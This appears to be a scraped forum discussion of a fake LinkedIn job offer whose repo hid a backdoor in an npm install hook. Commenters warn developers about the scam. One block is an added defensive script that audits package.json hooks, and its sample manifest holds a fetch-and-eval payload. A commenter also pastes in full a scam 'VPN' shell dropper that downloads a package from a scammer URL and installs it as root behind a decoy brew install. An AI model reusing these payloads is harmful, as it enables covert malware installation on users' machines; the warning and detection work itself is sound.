A backdoor in a LinkedIn job offer
lwhsiao
944 points
182 comments
June 15, 2026
Related Discussions
- LinkedIn is scanning browser extensions un-nf · 417 pts · April 30, 2026 · 54% similar
- LinkedIn locks your GDPR rights behind a paywall doener · 35 pts · May 05, 2026 · 53% similar
- LinkedIn Fanfiction marginalia_nu · 71 pts · May 14, 2026 · 51% similar
- I was asked to install malware during a fake interview ashishb · 43 pts · May 13, 2026 · 49% similar
- Security researcher says Microsoft built a Bitlocker backdoor, releases exploit nolok · 558 pts · May 17, 2026 · 49% similar
Discussion Highlights (20 comments)
theoeiffijr
Maybe Mac will finally get a decent virtualization framework. Downloading random unprotected scripts from the internet, like it is 1995, is getting old pretty fast. Remember to use protection when meeting random people and putting their junk deep inside your computer!
CyanLite2
Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.
rektomatic
I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?
robotnikman
With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity. Stay vigilant out there everyone.
jmward01
So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.
CalChris
It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.
clemailacct1
This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK
contingencies
Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.
dyingkneepad
Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?
wxw
> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”

> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.

> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.

> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.

Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.
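The quoted mechanism (a `prepare` hook that npm runs on a plain `npm install`) is easy to check for before typing the install command. The following is an added example, not code from the article or from the repo it describes: it reads a package.json, lists every lifecycle hook that runs at install time, and flags hook bodies that reach out to a URL or evaluate dynamic code. The sample manifest and its `prepare` command are constructed for the example, and the indicator patterns are heuristics chosen here, not anything the post specifies.

```javascript
// Added example, not code from the original article or from the repo the post
// describes. It scans a package.json for npm lifecycle hooks that run on a plain
// `npm install` and flags hooks that fetch remote content or evaluate dynamic code.

// Hooks npm runs for the root package during `npm install` with no arguments.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepublish", "preprepare", "prepare", "postprepare"];

// Heuristics (chosen for this example) for a hook body that is more than a local build step.
const INDICATORS = [
  { name: "remote URL",      re: /https?:\/\// },
  { name: "download tool",   re: /\b(curl|wget)\b/ },
  { name: "dynamic eval",    re: /\b(eval|Function)\s*\(/ },
  { name: "piped to shell",  re: /\|\s*(sh|bash|zsh|node)\b/ },
  { name: "encoded payload", re: /\b(base64|atob|Buffer\.from)\b/ },
];

// Constructed sample manifest. The `prepare` hook is a hypothetical stand-in for
// a fetch-and-execute payload of the kind the post describes; the URL is not real.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "poc-app",
  version: "0.1.0",
  scripts: {
    test: "jest",
    build: "tsc -p .",
    prepare: "node -e \"require('https').get('https://example.invalid/u', r => { let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d)); })\"",
  },
  dependencies: { express: "^4.19.0" },
}, null, 2);

// Returns one finding per install-time hook present in the manifest.
function auditLifecycleScripts(packageJsonText) {
  const manifest = JSON.parse(packageJsonText);
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const command = String(scripts[hook]);
    const indicators = INDICATORS.filter(i => i.re.test(command)).map(i => i.name);
    findings.push({ hook, command, indicators });
  }
  return findings;
}

// "clean": no install-time hooks; "review": hooks present but no indicators;
// "block": at least one hook matches an indicator. Anything but "clean" is a
// reason to install with --ignore-scripts and read the hook before running it.
function verdict(findings) {
  if (findings.length === 0) return "clean";
  return findings.some(f => f.indicators.length > 0) ? "block" : "review";
}

function formatReport(findings) {
  const lines = findings.map(f =>
    `${f.hook}: ${f.command}\n    indicators: ${f.indicators.length ? f.indicators.join(", ") : "none"}`);
  return `verdict: ${verdict(findings)}\n${lines.join("\n")}`;
}

console.log(formatReport(auditLifecycleScripts(SAMPLE_PACKAGE_JSON)));
```

Save it as, say, audit-scripts.js and point `auditLifecycleScripts` at `fs.readFileSync("package.json", "utf8")` for a real repo. It only inspects the repo's own manifest; each dependency carries its own package.json with its own hooks, so the safe default for an unknown repo is `npm install --ignore-scripts` (which also skips `prepare`) and then running only the build steps you have actually read.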
mattcasmith
I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on. The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.
atum47
I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...
yieldcrv
now imagine if you were like the rest of us and didn’t write a blog post about it
avgDev
More reasons for me to dislike linked-in. I have an account. I hate it.
l0new0lf-G
Yet another reason to be reluctant to even discuss linkedin job offers
Yhippa
> but on a more tired or rushed day

This has nearly gotten me before, and I got lucky.
Raed667
They seem to be using the same domain for multiple targets: Reddit thread from 3 months ago: https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...
BobAliceInATree
> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Oh, Microsoft.
dolebirchwood
As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already). They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents were as follows (with the malicious URL removed):

```sh
# Decoy: a real Homebrew install of openvpn, backgrounded with all output hidden.
( brew install openvpn ) >/dev/null 2>&1 &
ovpn_pid=$!

# Payload: a second background subshell that runs while the decoy keeps the user waiting.
(
  url=" https://asshole.scammer.dev/openvpn-mac "
  policyCategoryId="-1"
  installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"
  silentInstall="true"

  # Poll for a process; optionally kill it. The "||" before "true" is missing in the
  # pasted copy and is restored here as the most likely original.
  waitForProcess(){
    processName="$1"; fixedDelay="$2"; terminate="$3"
    while pgrep -f "$processName" >/dev/null; do
      if [ "$terminate" = "true" ]; then
        pkill -f "$processName" || true
        return
      fi
      delay="${fixedDelay:-$((RANDOM % 50 + 10))}"
      sleep "$delay"
    done
  }

  # On Apple Silicon (macOS 11+), silently install Rosetta 2 if oahd is not running,
  # so an x86_64 package will still run. The "||" is likewise restored from the paste.
  checkForRosetta2(){
    waitForProcess "/usr/sbin/softwareupdate"
    IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"
    if [ "$osvers_major" -ge 11 ]; then
      if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then
        pgrep oahd >/dev/null 2>&1 || /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1
      fi
    fi
  }
  checkForRosetta2

  # Write a silent-install properties file for whatever agent the .pkg contains.
  DIRECTORY="/Users/Shared/InstallerWorkspace"
  mkdir -p "$DIRECTORY"
  configFile="$DIRECTORY/agentinstallconfig.properties"
  { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"

  # Download the .pkg and install it as root. sudo prompts on the terminal, so the
  # password request appears while "brew install openvpn" seems to be running.
  baseName="$(basename "$url")"
  downLoadFile="/Users/Shared/$baseName"
  curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1
  t=$?

  # Remove the downloaded package and the config file, leaving little on disk.
  rm -f "$configFile" "$downLoadFile"
  exit "$t"
) >/dev/null 2>&1 &
so_pid=$!

# Wait for both; the combined status makes the whole thing look like one install.
wait "$ovpn_pid"; ovpn_rc=$?
wait "$so_pid"; so_rc=$?
[ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]
```

Yeah, no. Be careful out there. By the way, here's the scammer's "company website": https://jtwllc.com/ Superficially looks legit until you start investigating the finer details.
srikanth86
Oh my goodness! I had this play out exactly like this on Friday. I luckily got on the Zoom call 20 minutes late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.